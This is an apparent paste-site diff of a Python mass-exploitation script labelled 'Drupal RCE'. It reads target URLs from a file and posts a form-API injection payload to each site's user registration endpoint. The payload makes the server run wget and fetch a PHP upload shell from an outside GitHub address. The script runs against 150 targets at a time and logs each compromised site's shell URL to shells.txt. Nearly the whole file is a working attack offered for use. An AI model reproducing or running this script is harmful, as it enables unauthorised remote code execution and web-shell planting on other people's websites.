SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/env | |
2 | import sys | |
3 | import requests | |
4 | from multiprocessing.dummy import Pool | |
5 | import time | |
6 | ||
7 | ||
8 | ||
9 | ||
10 | ||
11 | try: | |
12 | target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] | |
13 | except IndexError: | |
14 | - | exit('Usage: m3.exe list.txt') |
14 | + | exit('Usage: m3.py list.txt') |
15 | def progressbar(it, prefix = "", size = 1000): | |
16 | count = len(it) | |
17 | def _show(_i): | |
18 | x = int(size*_i/count) | |
19 | sys.stdout.write("%s[%s%s] %i/%i\r" % (prefix, "#"*x, "_"*(size-x), _i, count)) | |
20 | sys.stdout.flush() | |
21 | _show(0) | |
22 | for i, item in enumerate(it): | |
23 | yield item | |
24 | _show(i+1) | |
25 | sys.stdout.write("\n") | |
26 | sys.stdout.flush() | |
27 | toolbar_width = 30 | |
28 | ||
29 | sys.stdout.write(":%s:" % (" " * toolbar_width)) | |
30 | sys.stdout.flush() | |
31 | sys.stdout.write("\b" * (toolbar_width+1)) | |
32 | ||
33 | for i in xrange(toolbar_width): | |
34 | time.sleep(0.01) | |
35 | ||
36 | sys.stdout.write("*") | |
37 | sys.stdout.flush() | |
38 | ||
39 | sys.stdout.write("\n") | |
40 | def slowprint(s): | |
41 | ||
42 | for c in s + '\n': | |
43 | ||
44 | sys.stdout.write(c) | |
45 | ||
46 | sys.stdout.flush() # defeat buffering | |
47 | ||
48 | time.sleep(60/90) | |
49 | print("------------------------------------------------------------------------") | |
50 | slowprint ("[-] Drupal RCE ") | |
51 | slowprint (" https://www.facebook.com/Remah.go.id/") | |
52 | ||
53 | payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'} | |
54 | headers = {'User-Agent': 'Mozilla 5.0'} | |
55 | ||
56 | def run(u): | |
57 | try: | |
58 | url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' | |
59 | r = requests.post(url, data=payload, verify=False, headers=headers) | |
60 | if 'Select Your File :' in requests.get(u+'/payload.php', verify=False, headers=headers).text: | |
61 | print ('Uploaded Here:', u + '/payload.php') | |
62 | with open('shells.txt', mode='a') as d: | |
63 | d.write(u + '/payload.php\n') | |
64 | else: | |
65 | print(u, " -> Can't Exploit") | |
66 | except: | |
67 | pass | |
68 | ||
69 | mp = Pool(150) | |
70 | mp.map(run, target) | |
71 | mp.close() | |
72 | mp.join() |